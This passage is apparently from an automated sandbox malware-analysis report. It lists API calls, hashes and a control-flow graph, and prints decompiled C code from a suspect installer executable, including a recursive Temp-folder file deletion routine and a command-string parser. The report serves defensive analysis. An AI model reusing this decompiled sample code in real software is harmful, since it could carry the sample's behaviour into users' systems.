                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
                    • ShowWindow.USER32(00000000,?), ref: 004057F4
                    • ShowWindow.USER32(?,00000008), ref: 00405808
                    • GetDlgItem.USER32(?,000003EC), ref: 00405829
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
                    • GetDlgItem.USER32(?,000003F8), ref: 00405737
                      • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                    • GetDlgItem.USER32(?,000003EC), ref: 0040587B
                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000564F,00000000), ref: 00405889
                    • CloseHandle.KERNELBASE(00000000), ref: 00405890
                    • ShowWindow.USER32(00000000), ref: 004058B4
                    • ShowWindow.USER32(?,00000008), ref: 004058B9
                    • ShowWindow.USER32(00000008), ref: 00405903
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
                    • CreatePopupMenu.USER32 ref: 00405948
                    • AppendMenuW.USER32 ref: 0040595C
                    • GetWindowRect.USER32(?,?), ref: 0040597C
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
                    • OpenClipboard.USER32(00000000), ref: 004059DD
                    • EmptyClipboard.USER32 ref: 004059E3
                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
                    • GlobalLock.KERNEL32 ref: 004059F9
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
                    • SetClipboardData.USER32 ref: 00405A38
                    • CloseClipboard.USER32 ref: 00405A3E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                    • Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
                    • Opcode Fuzzy Hash: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                    • Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 442 405c26-405c4c call 405ef1 445 405c65-405c6c 442->445 446 405c4e-405c60 DeleteFileW 442->446 448 405c6e-405c70 445->448 449 405c7f-405c8f call 40651a 445->449 447 405de2-405de6 446->447 450 405d90-405d95 448->450 451 405c76-405c79 448->451 455 405c91-405c9c lstrcatW 449->455 456 405c9e-405c9f call 405e35 449->456 450->447 454 405d97-405d9a 450->454 451->449 451->450 457 405da4-405dac call 406850 454->457 458 405d9c-405da2 454->458 459 405ca4-405ca8 455->459 456->459 457->447 465 405dae-405dc2 call 405de9 call 405bde 457->465 458->447 463 405cb4-405cba lstrcatW 459->463 464 405caa-405cb2 459->464 466 405cbf-405cdb lstrlenW FindFirstFileW 463->466 464->463 464->466 482 405dc4-405dc7 465->482 483 405dda-405ddd call 40557c 465->483 467 405ce1-405ce9 466->467 468 405d85-405d89 466->468 470 405d09-405d1d call 40651a 467->470 471 405ceb-405cf3 467->471 468->450 473 405d8b 468->473 484 405d34-405d3f call 405bde 470->484 485 405d1f-405d27 470->485 474 405cf5-405cfd 471->474 475 405d68-405d78 FindNextFileW 471->475 473->450 474->470 478 405cff-405d07 474->478 475->467 481 405d7e-405d7f FindClose 475->481 478->470 478->475 481->468 482->458 486 405dc9-405dd8 call 40557c call 4062da 482->486 483->447 495 405d60-405d63 call 40557c 484->495 496 405d41-405d44 484->496 485->475 487 405d29-405d32 call 405c26 485->487 486->447 487->475 495->475 499 405d46-405d56 call 40557c call 4062da 496->499 500 405d58-405d5e 496->500 499->475 500->475
                    C-Code - Quality: 98%
                    			E00405C26(void* __eflags, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				short _v556;
                    				short _v558;
                    				struct _WIN32_FIND_DATAW _v604;
                    				signed int _t38;
                    				signed int _t52;
                    				signed int _t55;
                    				signed int _t62;
                    				void* _t64;
                    				signed char _t65;
                    				WCHAR* _t66;
                    				void* _t67;
                    				WCHAR* _t68;
                    				void* _t70;
                    
                    				_t65 = _a8;
                    				_t68 = _a4;
                    				_v8 = _t65 & 0x00000004;
                    				_t38 = E00405EF1(__eflags, _t68);
                    				_v12 = _t38;
                    				if((_t65 & 0x00000008) != 0) {
                    					_t62 = DeleteFileW(_t68); // executed
                    					asm("sbb eax, eax");
                    					_t64 =  ~_t62 + 1;
                    					 *0x7a8ae8 =  *0x7a8ae8 + _t64;
                    					return _t64;
                    				}
                    				_a4 = _t65;
                    				_t8 =  &_a4;
                    				 *_t8 = _a4 & 0x00000001;
                    				__eflags =  *_t8;
                    				if( *_t8 == 0) {
                    					L5:
                    					E0040651A(0x7a3f50, _t68);
                    					__eflags = _a4;
                    					if(_a4 == 0) {
                    						E00405E35(_t68);
                    					} else {
                    						lstrcatW(0x7a3f50, L"\\*.*");
                    					}
                    					__eflags =  *_t68;
                    					if( *_t68 != 0) {
                    						L10:
                    						lstrcatW(_t68, 0x40a014);
                    						L11:
                    						_t66 =  &(_t68[lstrlenW(_t68)]);
                    						_t38 = FindFirstFileW(0x7a3f50,  &_v604);
                    						_t70 = _t38;
                    						__eflags = _t70 - 0xffffffff;
                    						if(_t70 == 0xffffffff) {
                    							L26:
                    							__eflags = _a4;
                    							if(_a4 != 0) {
                    								_t30 = _t66 - 2;
                    								 *_t30 =  *(_t66 - 2) & 0x00000000;
                    								__eflags =  *_t30;
                    							}
                    							goto L28;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							L12:
                    							__eflags = _v604.cFileName - 0x2e;
                    							if(_v604.cFileName != 0x2e) {
                    								L16:
                    								E0040651A(_t66,  &(_v604.cFileName));
                    								__eflags = _v604.dwFileAttributes & 0x00000010;
                    								if(__eflags == 0) {
                    									_t52 = E00405BDE(__eflags, _t68, _v8);
                    									__eflags = _t52;
                    									if(_t52 != 0) {
                    										E0040557C(0xfffffff2, _t68);
                    									} else {
                    										__eflags = _v8 - _t52;
                    										if(_v8 == _t52) {
                    											 *0x7a8ae8 =  *0x7a8ae8 + 1;
                    										} else {
                    											E0040557C(0xfffffff1, _t68);
                    											E004062DA(_t67, _t68, 0);
                    										}
                    									}
                    								} else {
                    									__eflags = (_a8 & 0x00000003) - 3;
                    									if(__eflags == 0) {
                    										E00405C26(__eflags, _t68, _a8);
                    									}
                    								}
                    								goto L24;
                    							}
                    							__eflags = _v558;
                    							if(_v558 == 0) {
                    								goto L24;
                    							}
                    							__eflags = _v558 - 0x2e;
                    							if(_v558 != 0x2e) {
                    								goto L16;
                    							}
                    							__eflags = _v556;
                    							if(_v556 == 0) {
                    								goto L24;
                    							}
                    							goto L16;
                    							L24:
                    							_t55 = FindNextFileW(_t70,  &_v604);
                    							__eflags = _t55;
                    						} while (_t55 != 0);
                    						_t38 = FindClose(_t70);
                    						goto L26;
                    					}
                    					__eflags =  *0x7a3f50 - 0x5c;
                    					if( *0x7a3f50 != 0x5c) {
                    						goto L11;
                    					}
                    					goto L10;
                    				} else {
                    					__eflags = _t38;
                    					if(_t38 == 0) {
                    						L28:
                    						__eflags = _a4;
                    						if(_a4 == 0) {
                    							L36:
                    							return _t38;
                    						}
                    						__eflags = _v12;
                    						if(_v12 != 0) {
                    							_t38 = E00406850(_t68);
                    							__eflags = _t38;
                    							if(_t38 == 0) {
                    								goto L36;
                    							}
                    							E00405DE9(_t68);
                    							_t38 = E00405BDE(__eflags, _t68, _v8 | 0x00000001);
                    							__eflags = _t38;
                    							if(_t38 != 0) {
                    								return E0040557C(0xffffffe5, _t68);
                    							}
                    							__eflags = _v8;
                    							if(_v8 == 0) {
                    								goto L30;
                    							}
                    							E0040557C(0xfffffff1, _t68);
                    							return E004062DA(_t67, _t68, 0);
                    						}
                    						L30:
                    						 *0x7a8ae8 =  *0x7a8ae8 + 1;
                    						return _t38;
                    					}
                    					__eflags = _t65 & 0x00000002;
                    					if((_t65 & 0x00000002) == 0) {
                    						goto L28;
                    					}
                    					goto L5;
                    				}
                    			}


















                    0x00405c30
                    0x00405c35
                    0x00405c3e
                    0x00405c41
                    0x00405c49
                    0x00405c4c
                    0x00405c4f
                    0x00405c57
                    0x00405c59
                    0x00405c5a
                    0x00000000
                    0x00405c5a
                    0x00405c65
                    0x00405c68
                    0x00405c68
                    0x00405c68
                    0x00405c6c
                    0x00405c7f
                    0x00405c86
                    0x00405c8b
                    0x00405c8f
                    0x00405c9f
                    0x00405c91
                    0x00405c97
                    0x00405c97
                    0x00405ca4
                    0x00405ca8
                    0x00405cb4
                    0x00405cba
                    0x00405cbf
                    0x00405cc5
                    0x00405cd0
                    0x00405cd6
                    0x00405cd8
                    0x00405cdb
                    0x00405d85
                    0x00405d85
                    0x00405d89
                    0x00405d8b
                    0x00405d8b
                    0x00405d8b
                    0x00405d8b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ce1
                    0x00405ce1
                    0x00405ce1
                    0x00405ce9
                    0x00405d09
                    0x00405d11
                    0x00405d16
                    0x00405d1d
                    0x00405d38
                    0x00405d3d
                    0x00405d3f
                    0x00405d63
                    0x00405d41
                    0x00405d41
                    0x00405d44
                    0x00405d58
                    0x00405d46
                    0x00405d49
                    0x00405d51
                    0x00405d51
                    0x00405d44
                    0x00405d1f
                    0x00405d25
                    0x00405d27
                    0x00405d2d
                    0x00405d2d
                    0x00405d27
                    0x00000000
                    0x00405d1d
                    0x00405ceb
                    0x00405cf3
                    0x00000000
                    0x00000000
                    0x00405cf5
                    0x00405cfd
                    0x00000000
                    0x00000000
                    0x00405cff
                    0x00405d07
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405d68
                    0x00405d70
                    0x00405d76
                    0x00405d76
                    0x00405d7f
                    0x00000000
                    0x00405d7f
                    0x00405caa
                    0x00405cb2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c6e
                    0x00405c6e
                    0x00405c70
                    0x00405d90
                    0x00405d92
                    0x00405d95
                    0x00405de6
                    0x00405de6
                    0x00405de6
                    0x00405d97
                    0x00405d9a
                    0x00405da5
                    0x00405daa
                    0x00405dac
                    0x00000000
                    0x00000000
                    0x00405daf
                    0x00405dbb
                    0x00405dc0
                    0x00405dc2
                    0x00000000
                    0x00405ddd
                    0x00405dc4
                    0x00405dc7
                    0x00000000
                    0x00000000
                    0x00405dcc
                    0x00000000
                    0x00405dd3
                    0x00405d9c
                    0x00405d9c
                    0x00000000
                    0x00405d9c
                    0x00405c76
                    0x00405c79
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c79

                    APIs
                    • DeleteFileW.KERNELBASE(?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
                    • lstrcatW.KERNEL32 ref: 00405C97
                    • lstrcatW.KERNEL32 ref: 00405CBA
                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
                    • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
                    • FindClose.KERNEL32(00000000), ref: 00405D7F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                    • API String ID: 2035342205-3834854073
                    • Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                    • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                    • Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                    • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E734F1BFF() {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				WCHAR* _v24;
                    				WCHAR* _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				WCHAR* _v48;
                    				signed int _v52;
                    				void* _v56;
                    				intOrPtr _v60;
                    				WCHAR* _t208;
                    				signed int _t211;
                    				void* _t213;
                    				void* _t215;
                    				WCHAR* _t217;
                    				void* _t225;
                    				struct HINSTANCE__* _t226;
                    				struct HINSTANCE__* _t227;
                    				struct HINSTANCE__* _t229;
                    				signed short _t231;
                    				struct HINSTANCE__* _t234;
                    				struct HINSTANCE__* _t236;
                    				void* _t237;
                    				intOrPtr* _t238;
                    				void* _t249;
                    				signed char _t250;
                    				signed int _t251;
                    				void* _t255;
                    				struct HINSTANCE__* _t257;
                    				void* _t258;
                    				signed int _t260;
                    				signed int _t261;
                    				signed short* _t264;
                    				signed int _t269;
                    				signed int _t272;
                    				signed int _t274;
                    				void* _t277;
                    				void* _t281;
                    				struct HINSTANCE__* _t283;
                    				signed int _t286;
                    				void _t287;
                    				signed int _t288;
                    				signed int _t300;
                    				signed int _t301;
                    				signed short _t304;
                    				void* _t305;
                    				signed int _t309;
                    				signed int _t312;
                    				signed int _t315;
                    				signed int _t316;
                    				signed int _t317;
                    				signed short* _t321;
                    				WCHAR* _t322;
                    				WCHAR* _t324;
                    				WCHAR* _t325;
                    				struct HINSTANCE__* _t326;
                    				void* _t328;
                    				signed int _t331;
                    				void* _t332;
                    
                    				_t283 = 0;
                    				_v32 = 0;
                    				_v36 = 0;
                    				_v16 = 0;
                    				_v8 = 0;
                    				_v40 = 0;
                    				_t332 = 0;
                    				_v52 = 0;
                    				_v44 = 0;
                    				_t208 = E734F12BB();
                    				_v24 = _t208;
                    				_v28 = _t208;
                    				_v48 = E734F12BB();
                    				_t321 = E734F12E3();
                    				_v56 = _t321;
                    				_v12 = _t321;
                    				while(1) {
                    					_t211 = _v32;
                    					_v60 = _t211;
                    					if(_t211 != _t283 && _t332 == _t283) {
                    						break;
                    					}
                    					_t286 =  *_t321 & 0x0000ffff;
                    					_t213 = _t286 - _t283;
                    					if(_t213 == 0) {
                    						_t37 =  &_v32;
                    						 *_t37 = _v32 | 0xffffffff;
                    						__eflags =  *_t37;
                    						L20:
                    						_t215 = _v60 - _t283;
                    						if(_t215 == 0) {
                    							__eflags = _t332 - _t283;
                    							 *_v28 = _t283;
                    							if(_t332 == _t283) {
                    								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                    								_t332 = _t255;
                    								 *(_t332 + 0x1010) = _t283;
                    								 *(_t332 + 0x1014) = _t283;
                    							}
                    							_t287 = _v36;
                    							_t47 = _t332 + 8; // 0x8
                    							_t217 = _t47;
                    							_t48 = _t332 + 0x808; // 0x808
                    							_t322 = _t48;
                    							 *_t332 = _t287;
                    							_t288 = _t287 - _t283;
                    							__eflags = _t288;
                    							 *_t217 = _t283;
                    							 *_t322 = _t283;
                    							 *(_t332 + 0x1008) = _t283;
                    							 *(_t332 + 0x100c) = _t283;
                    							 *(_t332 + 4) = _t283;
                    							if(_t288 == 0) {
                    								__eflags = _v28 - _v24;
                    								if(_v28 == _v24) {
                    									goto L42;
                    								}
                    								_t328 = 0;
                    								GlobalFree(_t332);
                    								_t332 = E734F13B1(_v24);
                    								__eflags = _t332 - _t283;
                    								if(_t332 == _t283) {
                    									goto L42;
                    								} else {
                    									goto L35;
                    								}
                    								while(1) {
                    									L35:
                    									_t249 =  *(_t332 + 0x1ca0);
                    									__eflags = _t249 - _t283;
                    									if(_t249 == _t283) {
                    										break;
                    									}
                    									_t328 = _t332;
                    									_t332 = _t249;
                    									__eflags = _t332 - _t283;
                    									if(_t332 != _t283) {
                    										continue;
                    									}
                    									break;
                    								}
                    								__eflags = _t328 - _t283;
                    								if(_t328 != _t283) {
                    									 *(_t328 + 0x1ca0) = _t283;
                    								}
                    								_t250 =  *(_t332 + 0x1010);
                    								__eflags = _t250 & 0x00000008;
                    								if((_t250 & 0x00000008) == 0) {
                    									_t251 = _t250 | 0x00000002;
                    									__eflags = _t251;
                    									 *(_t332 + 0x1010) = _t251;
                    								} else {
                    									_t332 = E734F162F(_t332);
                    									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                    								}
                    								goto L42;
                    							} else {
                    								_t300 = _t288 - 1;
                    								__eflags = _t300;
                    								if(_t300 == 0) {
                    									L31:
                    									lstrcpyW(_t217, _v48);
                    									L32:
                    									lstrcpyW(_t322, _v24);
                    									goto L42;
                    								}
                    								_t301 = _t300 - 1;
                    								__eflags = _t301;
                    								if(_t301 == 0) {
                    									goto L32;
                    								}
                    								__eflags = _t301 != 1;
                    								if(_t301 != 1) {
                    									goto L42;
                    								}
                    								goto L31;
                    							}
                    						} else {
                    							if(_t215 == 1) {
                    								_t257 = _v16;
                    								if(_v40 == _t283) {
                    									_t257 = _t257 - 1;
                    								}
                    								 *(_t332 + 0x1014) = _t257;
                    							}
                    							L42:
                    							_v12 = _v12 + 2;
                    							_v28 = _v24;
                    							L59:
                    							if(_v32 != 0xffffffff) {
                    								_t321 = _v12;
                    								continue;
                    							}
                    							break;
                    						}
                    					}
                    					_t258 = _t213 - 0x23;
                    					if(_t258 == 0) {
                    						__eflags = _t321 - _v56;
                    						if(_t321 <= _v56) {
                    							L17:
                    							__eflags = _v44 - _t283;
                    							if(_v44 != _t283) {
                    								L43:
                    								_t260 = _v32 - _t283;
                    								__eflags = _t260;
                    								if(_t260 == 0) {
                    									_t261 = _t286;
                    									while(1) {
                    										__eflags = _t261 - 0x22;
                    										if(_t261 != 0x22) {
                    											break;
                    										}
                    										_t321 =  &(_t321[1]);
                    										__eflags = _v44 - _t283;
                    										_v12 = _t321;
                    										if(_v44 == _t283) {
                    											_v44 = 1;
                    											L162:
                    											_v28 =  &(_v28[0]);
                    											 *_v28 =  *_t321;
                    											L58:
                    											_t331 =  &(_t321[1]);
                    											__eflags = _t331;
                    											_v12 = _t331;
                    											goto L59;
                    										}
                    										_t261 =  *_t321 & 0x0000ffff;
                    										_v44 = _t283;
                    									}
                    									__eflags = _t261 - 0x2a;
                    									if(_t261 == 0x2a) {
                    										_v36 = 2;
                    										L57:
                    										_t321 = _v12;
                    										_v28 = _v24;
                    										_t283 = 0;
                    										__eflags = 0;
                    										goto L58;
                    									}
                    									__eflags = _t261 - 0x2d;
                    									if(_t261 == 0x2d) {
                    										L151:
                    										_t304 =  *_t321;
                    										__eflags = _t304 - 0x2d;
                    										if(_t304 != 0x2d) {
                    											L154:
                    											_t264 =  &(_t321[1]);
                    											__eflags =  *_t264 - 0x3a;
                    											if( *_t264 != 0x3a) {
                    												goto L162;
                    											}
                    											__eflags = _t304 - 0x2d;
                    											if(_t304 == 0x2d) {
                    												goto L162;
                    											}
                    											_v36 = 1;
                    											L157:
                    											_v12 = _t264;
                    											__eflags = _v28 - _v24;
                    											if(_v28 <= _v24) {
                    												 *_v48 = _t283;
                    											} else {
                    												 *_v28 = _t283;
                    												lstrcpyW(_v48, _v24);
                    											}
                    											goto L57;
                    										}
                    										_t264 =  &(_t321[1]);
                    										__eflags =  *_t264 - 0x3e;
                    										if( *_t264 != 0x3e) {
                    											goto L154;
                    										}
                    										_v36 = 3;
                    										goto L157;
                    									}
                    									__eflags = _t261 - 0x3a;
                    									if(_t261 != 0x3a) {
                    										goto L162;
                    									}
                    									goto L151;
                    								}
                    								_t269 = _t260 - 1;
                    								__eflags = _t269;
                    								if(_t269 == 0) {
                    									L80:
                    									_t305 = _t286 + 0xffffffde;
                    									__eflags = _t305 - 0x55;
                    									if(_t305 > 0x55) {
                    										goto L57;
                    									}
                    									switch( *((intOrPtr*)(( *(_t305 + 0x734f23e8) & 0x000000ff) * 4 +  &M734F235C))) {
                    										case 0:
                    											__ecx = _v24;
                    											__edi = _v12;
                    											while(1) {
                    												__edi = __edi + 1;
                    												__edi = __edi + 1;
                    												_v12 = __edi;
                    												__ax =  *__edi;
                    												__eflags = __ax - __dx;
                    												if(__ax != __dx) {
                    													goto L132;
                    												}
                    												L131:
                    												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                    												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                    													L136:
                    													 *__ecx =  *__ecx & 0x00000000;
                    													__eax = E734F12CC(_v24);
                    													__ebx = __eax;
                    													goto L97;
                    												}
                    												L132:
                    												__eflags = __ax;
                    												if(__ax == 0) {
                    													goto L136;
                    												}
                    												__eflags = __ax - __dx;
                    												if(__ax == __dx) {
                    													__edi = __edi + 1;
                    													__edi = __edi + 1;
                    													__eflags = __edi;
                    												}
                    												__ax =  *__edi;
                    												 *__ecx =  *__edi;
                    												__ecx = __ecx + 1;
                    												__ecx = __ecx + 1;
                    												__edi = __edi + 1;
                    												__edi = __edi + 1;
                    												_v12 = __edi;
                    												__ax =  *__edi;
                    												__eflags = __ax - __dx;
                    												if(__ax != __dx) {
                    													goto L132;
                    												}
                    												goto L131;
                    											}
                    										case 1:
                    											_v8 = 1;
                    											goto L57;
                    										case 2:
                    											_v8 = _v8 | 0xffffffff;
                    											goto L57;
                    										case 3:
                    											_v8 = _v8 & 0x00000000;
                    											_v20 = _v20 & 0x00000000;
                    											_v16 = _v16 + 1;
                    											goto L85;
                    										case 4:
                    											__eflags = _v20;
                    											if(_v20 != 0) {
                    												goto L57;
                    											}
                    											_v12 = _v12 - 2;
                    											__ebx = E734F12BB();
                    											 &_v12 = E734F1B86( &_v12);
                    											__eax = E734F1510(__edx, __eax, __edx, __ebx);
                    											goto L97;
                    										case 5:
                    											L105:
                    											_v20 = _v20 + 1;
                    											goto L57;
                    										case 6:
                    											_push(7);
                    											goto L123;
                    										case 7:
                    											_push(0x19);
                    											goto L143;
                    										case 8:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L107;
                    										case 9:
                    											_push(0x15);
                    											goto L143;
                    										case 0xa:
                    											_push(0x16);
                    											goto L143;
                    										case 0xb:
                    											_push(0x18);
                    											goto L143;
                    										case 0xc:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L118;
                    										case 0xd:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L109;
                    										case 0xe:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L111;
                    										case 0xf:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L122;
                    										case 0x10:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L113;
                    										case 0x11:
                    											_push(3);
                    											goto L123;
                    										case 0x12:
                    											_push(0x17);
                    											L143:
                    											_pop(__ebx);
                    											goto L98;
                    										case 0x13:
                    											__eax =  &_v12;
                    											__eax = E734F1B86( &_v12);
                    											__ebx = __eax;
                    											__ebx = __eax + 1;
                    											__eflags = __ebx - 0xb;
                    											if(__ebx < 0xb) {
                    												__ebx = __ebx + 0xa;
                    											}
                    											goto L97;
                    										case 0x14:
                    											__ebx = 0xffffffff;
                    											goto L98;
                    										case 0x15:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L116;
                    										case 0x16:
                    											__ecx = 0;
                    											__eflags = 0;
                    											goto L91;
                    										case 0x17:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L120;
                    										case 0x18:
                    											_t271 =  *(_t332 + 0x1014);
                    											__eflags = _t271 - _v16;
                    											if(_t271 > _v16) {
                    												_v16 = _t271;
                    											}
                    											_v8 = _v8 & 0x00000000;
                    											_v20 = _v20 & 0x00000000;
                    											_v36 - 3 = _t271 - (_v36 == 3);
                    											if(_t271 != _v36 == 3) {
                    												L85:
                    												_v40 = 1;
                    											}
                    											goto L57;
                    										case 0x19:
                    											L107:
                    											__ecx = 0;
                    											_v8 = 2;
                    											__ecx = 1;
                    											goto L91;
                    										case 0x1a:
                    											L118:
                    											_push(5);
                    											goto L123;
                    										case 0x1b:
                    											L109:
                    											__ecx = 0;
                    											_v8 = 3;
                    											__ecx = 1;
                    											goto L91;
                    										case 0x1c:
                    											L111:
                    											__ecx = 0;
                    											__ecx = 1;
                    											goto L91;
                    										case 0x1d:
                    											L122:
                    											_push(6);
                    											goto L123;
                    										case 0x1e:
                    											L113:
                    											_push(2);
                    											goto L123;
                    										case 0x1f:
                    											__eax =  &_v12;
                    											__eax = E734F1B86( &_v12);
                    											__ebx = __eax;
                    											__ebx = __eax + 1;
                    											goto L97;
                    										case 0x20:
                    											L116:
                    											_v52 = _v52 + 1;
                    											_push(4);
                    											_pop(__ecx);
                    											goto L91;
                    										case 0x21:
                    											L120:
                    											_push(4);
                    											L123:
                    											_pop(__ecx);
                    											L91:
                    											__edi = _v16;
                    											__edx =  *(0x734f405c + __ecx * 4);
                    											__eax =  ~__eax;
                    											asm("sbb eax, eax");
                    											_v40 = 1;
                    											__edi = _v16 << 5;
                    											__eax = __eax & 0x00008000;
                    											__edi = (_v16 << 5) + __esi;
                    											__eax = __eax | __ecx;
                    											__eflags = _v8;
                    											 *(__edi + 0x1018) = __eax;
                    											if(_v8 < 0) {
                    												L93:
                    												__edx = 0;
                    												__edx = 1;
                    												__eflags = 1;
                    												L94:
                    												__eflags = _v8 - 1;
                    												 *(__edi + 0x1028) = __edx;
                    												if(_v8 == 1) {
                    													__eax =  &_v12;
                    													__eax = E734F1B86( &_v12);
                    													__eax = __eax + 1;
                    													__eflags = __eax;
                    													_v8 = __eax;
                    												}
                    												__eax = _v8;
                    												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                    												_t136 = _v16 + 0x81; // 0x81
